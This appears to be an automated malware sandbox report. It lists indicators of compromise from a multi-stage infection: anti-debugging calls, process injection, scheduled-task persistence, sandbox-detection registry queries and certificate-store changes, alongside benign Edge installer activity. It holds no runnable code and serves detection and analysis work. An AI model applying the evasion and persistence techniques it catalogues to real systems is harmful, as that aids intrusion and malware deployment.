File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326	NUDcnOd.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326	NUDcnOd.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	C8VQANJgr5qxpu6q8o1ZlQUE.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
4236	explortu.exe
4776	869ad9587e.exe
1732	axplont.exe
5016	2bf30d8f13.exe
220	axplont.exe
4564	explortu.exe
4796	explortu.exe
5668	axplont.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 224 set thread context of 2580	224	33333.exe	108
PID 540 set thread context of 5108	540	lumma1234.exe	117
PID 880 set thread context of 4620	880	gold.exe	120
PID 4532 set thread context of 2860	4532	swizzzz.exe	127
PID 3136 set thread context of 5448	3136	file300un.exe	143
PID 5852 set thread context of 220	5852	hC0GJcs7DpneAK2PnSD0aFRV.exe	171
PID 5852 set thread context of 5676	5852	hC0GJcs7DpneAK2PnSD0aFRV.exe	292
PID 220 set thread context of 1588	220	AddInProcess32.exe	300

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Trust Protection Lists\Mu\Social	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\hi.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\is.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\te.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\en-US.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\lt.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\125.0.2535.79\MicrosoftEdge_X64_125.0.2535.79.exe	MicrosoftEdgeUpdate.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\mip_protection_sdk.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Trust Protection Lists\Sigma\Social	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\BHO\ie_to_edge_stub.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\sv.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\ca.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\sq.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\kn.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\BHO\ie_to_edge_stub.exe	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\az.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\125.0.2535.79.manifest	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\et.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\MEIPreload\preloaded_data.pb	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\it.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\vi.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\msedgeupdateres_sr.dll	MicrosoftEdgeWebview2Setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\identity_proxy\dev.identity_helper.exe.manifest	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\resources.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\es.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Trust Protection Lists\Mu\Social	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\delegatedWebFeatures.sccd	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\microsoft_shell_integration.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\qu.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Trust Protection Lists\Sigma\Staging	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\ar.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\msedgeupdateres_zh-TW.dll	MicrosoftEdgeWebview2Setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\hr.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\nb.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\ro.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Trust Protection Lists\Mu\Other	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\fa.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\vi.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\microsoft_shell_integration.dll	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\msedge.dll.sig	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Trust Protection Lists\Sigma\Analytics	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\concrt140.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\msedgewebview2.exe	setup.exe
File created	C:\Program Files (x86)\JipyTrDkU\RFhKjln.xml	NUDcnOd.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\kok.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\ko.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\MEIPreload\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\fr-CA.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\msedgeupdateres_lt.dll	MicrosoftEdgeWebview2Setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\BHO\ie_to_edge_bho_64.dll	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\mk.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Trust Protection Lists\Mu\Entities	setup.exe
File created	C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\EdgeUpdate.dat	MicrosoftEdgeWebview2Setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\lv.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\copilot_provider_msix\copilot_provider_neutral.msix	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\telclient.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\ko.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\sr-Latn-RS.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\VisualElements\SmallLogoCanary.png	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\MEIPreload\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\zh-TW.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.79\Locales\zh-CN.pak	setup.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\identity_helper.exe	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\125.0.2535.79\Locales\ro.pak	setup.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job	schtasks.exe
File created	C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job	schtasks.exe
File created	C:\Windows\Tasks\jiLwFdOzPPQiWLm.job	schtasks.exe
File created	C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job	schtasks.exe
File created	C:\Windows\Tasks\explortu.job	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
File created	C:\Windows\Tasks\axplont.job	869ad9587e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
5104	224	WerFault.exe	107
3276	880	WerFault.exe	118
4300	6132	WerFault.exe	208
1948	4640	WerFault.exe	176
5412	3096	WerFault.exe	307

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AddInProcess32.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AddInProcess32.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AddInProcess32.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
64	schtasks.exe
2876	schtasks.exe
5884	schtasks.exe
5080	schtasks.exe
3976	schtasks.exe
3832	schtasks.exe
1508	schtasks.exe
3996	schtasks.exe
5696	schtasks.exe
5784	schtasks.exe
4604	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2924	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	NUDcnOd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a968b372-0000-0000-0000-d01200000000}	NUDcnOd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	NUDcnOd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	NUDcnOd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a968b372-0000-0000-0000-d01200000000}	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{89FDB4D0-1F76-49D6-A941-6C3C08FC261F}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ = "Microsoft Edge Update Broker Class Factory"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine\ = "Microsoft Edge Update Broker Class Factory"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods\ = "24"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\PROGID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\ = "Microsoft Edge Update Update3Web"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\NumMethods\ = "7"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ = "ICredentialDialog"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89FDB4D0-1F76-49D6-A941-6C3C08FC261F}\InprocHandler32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods\ = "9"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\msedgeupdate.dll,-1004"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89FDB4D0-1F76-49D6-A941-6C3C08FC261F}\InprocHandler32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89FDB4D0-1F76-49D6-A941-6C3C08FC261F}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B}\PROGID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ = "IPolicyStatus2"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\CLSID\ = "{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2B1EC306-3EDE-4012-9BB0-FB836132FF52}\ = "PSFactoryBuffer"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc.1.0\ = "Microsoft Edge Update Update3Web"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{89FDB4D0-1F76-49D6-A941-6C3C08FC261F}\InprocHandler32\ThreadingModel = "Both"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\ = "Microsoft Edge Update Broker Class Factory"	MicrosoftEdgeUpdate.exe
